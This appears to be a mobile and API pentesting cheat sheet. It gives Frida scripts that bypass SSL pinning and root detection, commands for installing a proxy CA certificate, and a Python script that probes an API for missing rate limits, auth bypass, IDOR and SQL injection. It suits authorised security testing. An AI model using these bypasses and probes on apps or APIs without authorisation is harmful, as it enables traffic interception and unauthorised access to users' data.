Mobile & API Pentesting
๐ฅ Vibe Prompt
"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."
Mobile Setup
# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install Burp CA cert
adb push burp-ca.der /sdcard/
adb shell "su -c 'cp /sdcard/burp-ca.der /system/etc/security/cacerts/9a5ba575.0'"
# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings โ Profile)
# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js
Frida SSL Bypass
// ssl_bypass.js
Java.perform(function() {
var ArrayList = Java.use('java.util.ArrayList');
var TrustManager = Java.use('javax.net.ssl.TrustManager');
var TrustAll = Java.registerClass({
name: 'com.example.TrustAll',
implements: [TrustManager],
methods: {
checkClientTrusted: function(chain, authType) {},
checkServerTrusted: function(chain, authType) {},
getAcceptedIssuers: function() { return []; }
}
});
var SSLContext = Java.use('javax.net.ssl.SSLContext');
SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(keyManagers, trustManagers, secureRandom) {
return this.init(keyManagers, [TrustAll.$new()], secureRandom);
};
console.log("SSL pinning bypassed!");
});
# Run: frida -U -f com.target.app -l ssl_bypass.js
Root Detection Bypass
// root_bypass.js
Java.perform(function() {
// Method 1: Hook root check
var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
RootBeer.isRooted.implementation = function() { return false; };
// Method 2: Hide from detection
var Process = Java.use('java.lang.Process');
var File = Java.use('java.io.File');
File.exists.implementation = function() {
var path = this.getPath();
if (path.includes("su") || path.includes("magisk")) {
return false;
}
return this.exists();
};
console.log("Root detection bypassed!");
});
API Security Testing
import requests
BASE = "https://api.target.com/v1"
def test_api():
findings = []
# 1. Rate limiting
for i in range(100):
r = requests.post(f"{BASE}/login", json={"user": "admin", "pass": "wrong"})
if r.status_code != 429 and i > 10:
findings.append("No rate limiting on login!")
break
# 2. Auth bypass
r = requests.get(f"{BASE}/admin/users", headers={"Authorization": "Bearer invalid"})
if r.status_code == 200:
findings.append("Auth bypass!")
# 3. Mass assignment
r = requests.put(f"{BASE}/user/profile", json={"name": "test", "role": "admin"})
if r.status_code == 200:
findings.append("Mass assignment: role updated!")
# 4. IDOR
r1 = requests.get(f"{BASE}/orders/1", headers={"Authorization": f"Bearer {token}"})
r2 = requests.get(f"{BASE}/orders/2", headers={"Authorization": f"Bearer {token}"})
if r1.json().get("user_id") != r2.json().get("user_id") and r2.status_code == 200:
findings.append("IDOR: can access other orders!")
# 5. Injection
r = requests.get(f"{BASE}/search?q=' OR 1=1--")
if r.status_code == 200 and len(r.json()) > 0:
findings.append("SQL injection in search!")
return findings
for f in test_api():
print(f"โ ๏ธ {f}")
Mobile Pentesting Checklist
| Check | Android | iOS | |-------|---------|-----| | Traffic interception | Burp proxy + CA cert | QProxy + CA cert | | SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 | | Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack | | Insecure storage | SharedPrefs, SQLite | Keychain, Plist | | Hardcoded secrets | APK decompile | IPA decompile | | App clipping | Intent sniffing | URL scheme hijack | | Emulator detection | Build fingerprint | Model check |
Tools
| Tool | Purpose | |------|---------| | Frida | Runtime manipulation | | Objection | Mobile exploration | | APKTool | APK decompile | | MobSF | Static/dynamic analysis | | Drozer | Android security audit | | Radare2 | Binary analysis | | Hopper | iOS disassembler |
Best Practices
- Always test on real device (emulator detection common)
- Use Frida for runtime bypasses
- Decompile APK/IPA for hardcoded secrets
- Test both API and mobile app together
- Check for insecure data storage
- Verify rate limiting on all endpoints
- Test app clipping / intent hijacking